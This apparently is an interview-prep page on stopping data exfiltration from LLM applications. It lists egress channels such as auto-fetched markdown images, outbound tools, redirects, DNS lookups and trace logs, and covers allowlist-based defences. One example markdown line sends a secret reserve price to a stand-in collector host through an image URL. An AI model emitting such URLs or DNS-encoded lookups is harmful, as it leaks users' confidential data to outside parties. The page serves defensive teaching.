skip to content

Data-Exfiltration Controls

You learn that an injected model does not need a shell to leak data — a rendered image URL or an outbound tool call is enough. The mitigations are boring and effective: allowlist the channels the output can reach, scope retrieval per tenant, and redact what lands in logs.

on this pageshow

questions

5

Which output channels let an LLM app leak data without running code?

level: middleimportance: must knowfreq 62%

answer

  1. bytes leave without any code execution
  2. every sink that dereferences model output
  3. render, link, tool, webhook, redirect, DNS
  4. logs and traces are a channel too
  5. enumerate channels before choosing controls

basics

~20 s

Any path where model output causes a fetch is an egress channel: rendered image and link URLs, outbound tool or webhook calls, redirect targets, even hostname lookups. Controls only work once every such sink is enumerated.

solid answer

~50 s

Exfiltration does not need a shell. If any component acts on model output by making a network request, that component is an egress channel, and the secret rides inside the URL the model chose. The usual inventory: markdown or HTML images the client auto-fetches at render, hyperlinks a user may click, outbound HTTP tools called with a model-chosen host, webhook and notification integrations, redirect targets, and DNS resolution itself, since looking up a hostname that encodes data leaks bytes before any connection opens. Prompt and trace logs belong on the list too, because they copy everything the model saw into a store with a different access boundary. The practical consequence is that mitigation is per-channel: you cannot filter for leaky content, because the payload is ordinary text. You enumerate sinks, constrain each, and re-run the inventory whenever a rendering surface or tool is added.

code

markdown · 3 lines
markdown
Here is your summary.

![](https://collector.example/p?d=reserve_price_412000)

go deeper

for a junior

Be able to say that a model can leak data just by writing a URL that something else fetches, and name the obvious example of an image in rendered output.

for a middle

Explain the full channel list and why each one dereferences model output, including redirects and DNS, and explain why content filtering cannot be the main defence.

for a senior

Show that you would run the inventory as a living review tied to every new tool or rendering surface, and connect each channel to the specific allowlist that constrains it.

for a principal

Own the rule that no new output surface or outbound tool ships without a stated destination-control story, and be prepared to argue why bandwidth-based reasoning about low-rate channels is the wrong risk model.

## What exfiltration means in an LLM system Data exfiltration is any path by which bytes that should stay inside a trust boundary reach a party outside it. In a classic application that usually implies code execution: an attacker runs a process and copies files out. In an LLM application the bar is far lower. The model composes output, and some component downstream *acts* on that output by performing a network request. The attacker needs no shell and no vulnerability in your code; they only need the model to emit a string that some renderer, tool or integration will dereference. That is why this leaf treats the *channel inventory* as the first control. Everything else on the list, from output allowlists to egress policy, is an answer to a specific channel. If a channel is missing from the inventory, no control covers it. ## The inventory **Rendered sinks.** A chat surface that renders model-authored markdown or HTML will, by default, fetch what the model wrote. An image reference is the sharpest case because it fires with no user interaction: the browser requests the URL the moment the message paints. Link previews, iframes, background images in inline styles, video posters and web fonts behave the same way. In a multi-tenant real-estate CRM assistant that renders agent-authored notes as markdown, a single image reference whose query string carries a seller's reserve price is a complete leak, delivered by the victim's own browser. **Tool sinks.** Any tool that takes a URL, a hostname, an email address, a webhook target or a message recipient is an egress channel with the model holding the steering wheel. So are integrations one step removed: posting to a ticketing system, sending a chat message, writing to a shared document that outsiders can read. The destination does not have to be attacker-owned; a channel that reaches a wider internal audience than the data's own scope is still exfiltration. **Protocol-level sinks.** Redirects move a request from an approved host to an unapproved one. DNS is the subtlest: resolving a name is itself a message to whoever runs that zone, so a lookup for a hostname whose leftmost label encodes data leaks even when every TCP connection is blocked. Timing and error-code differences are lower-bandwidth versions of the same idea. **Storage sinks.** Prompt logs, trace stores and eval datasets copy the full context window, and their access control is almost always broader than that of the source systems the context was assembled from. Data that was tenant-scoped in the database becomes org-wide in the tracing UI. ## Why the inventory precedes the controls The payload of an LLM exfiltration is indistinguishable from legitimate output. A URL containing a customer name looks exactly like a URL containing a customer name. Content inspection therefore cannot be the primary defence; you would be trying to decide whether a legal-looking request is intended, which requires knowing the intent behind it. Channel enumeration inverts the problem into one that is decidable: for each way bytes can leave, is the destination on a list somebody approved? That reframing gives you allowlists rather than denylists at every sink. Render-time: which hosts may images and links resolve to. Tool layer: which hostnames may an outbound request reach. Retrieval layer: which tenant's corpus may this session read. Logging layer: which value shapes may be written at all. ## How the inventory is kept honest Treat it as a living artefact reviewed on change, not a one-off document. The recurring failure is a new surface arriving after the review: a mobile client that renders HTML the web client stripped, a Slack integration added to an agent that previously only read, an eval harness that replays production traces into a third-party judge. Each is a new channel, and each usually ships without anyone noticing it widened the egress surface. A useful discipline is to require, for every new output surface or tool, a one-line answer to two questions: what network requests can this cause as a direct consequence of model output, and who controls the destination? Anything that cannot answer both does not ship. ## Bandwidth matters less than you think Engineers often dismiss low-bandwidth channels: a DNS label carries only a few dozen bytes, so surely it is not worth defending. But the interesting secrets are small. An API key, a reserve price, a diagnosis code, a salary figure all fit in a query string. Rate limiting an egress channel reduces bulk copying but does not protect small high-value secrets, which is why allowlisting the destination beats throttling the volume.

  • Why is an image reference a sharper channel than a hyperlink in the same output?
    A hyperlink needs a click; the image fires automatically when the message renders, so the leak completes even if the user reads nothing and closes the tab. Link previews and inline background images behave like images, not links, which is why UI surfaces have to be classified by whether they auto-dereference rather than by whether they look clickable.
  • An agent runs in a sandbox with no outbound TCP. Is the egress surface closed?
    No. DNS resolution is usually still permitted so the sandbox can function, and a lookup for a hostname whose left-most label encodes data reaches the attacker's authoritative nameserver without any connection being established. Closing the surface means default-deny name resolution with an allowlist, not just blocking sockets.
  • Do prompt and trace logs really belong on an egress inventory?
    Yes. A trace stores the full context window, so tenant-scoped records, retrieved documents and any credentials that reached the prompt are duplicated into a store whose readers are usually the whole engineering org. It is a legitimate egress path with a different access boundary, and it needs its own control at the write path.

The model is a clerk who cannot leave the building but can write addresses on envelopes. Securing the exit means listing every mail slot, not reading every letter.

saying these in an interview costs you the question

  • Says exfiltration requires code execution or a shell
  • Believes blocking outbound TCP closes the egress surface
  • Thinks scanning output for sensitive strings is sufficient
  • Forgets that rendered markdown auto-fetches images
  • Ignores trace and prompt logs as an egress path

context

open as a page

Why bind the tenant filter on RAG retrieval server-side, not in the prompt?

level: middleimportance: must knowfreq 58%

basics

~20 s

Anything the model can influence can be widened by text that reaches it. Derive the tenant scope from the authenticated session and bind it at the query layer, so the model contributes only a search string and never the filter that decides which corpus is readable.

open as a page

How do you stop model-authored URLs and images from leaking data at render?

level: seniorimportance: must knowfreq 55%

basics

~20 s

Allowlist the destinations instead of inspecting payloads: strip or rewrite every model-authored image source through a same-origin proxy that only fetches approved hosts, restrict link targets to an approved list, never render model-authored raw HTML, and add a browser-enforced content policy as a backstop.

open as a page

How do you keep API keys and credentials out of LLM prompt logs and traces?

level: juniorimportance: should knowfreq 40%

basics

~20 s

Keep secrets out of the prompt in the first place by injecting them at the tool layer, then redact at the write path: match known credential formats before a trace record is stored, replace matches with a hash or placeholder, and restrict who can read the trace store.

open as a page

How do you stop an agent's HTTP tool from becoming an exfiltration path?

level: seniorimportance: should knowfreq 48%

basics

~20 s

Remove the model's control over the destination. Have tools take an identifier and build the URL server-side, run the tool runtime with default-deny network egress and an allowlist of approved hostnames, refuse cross-host redirects, and cap outbound body size and rate.

open as a page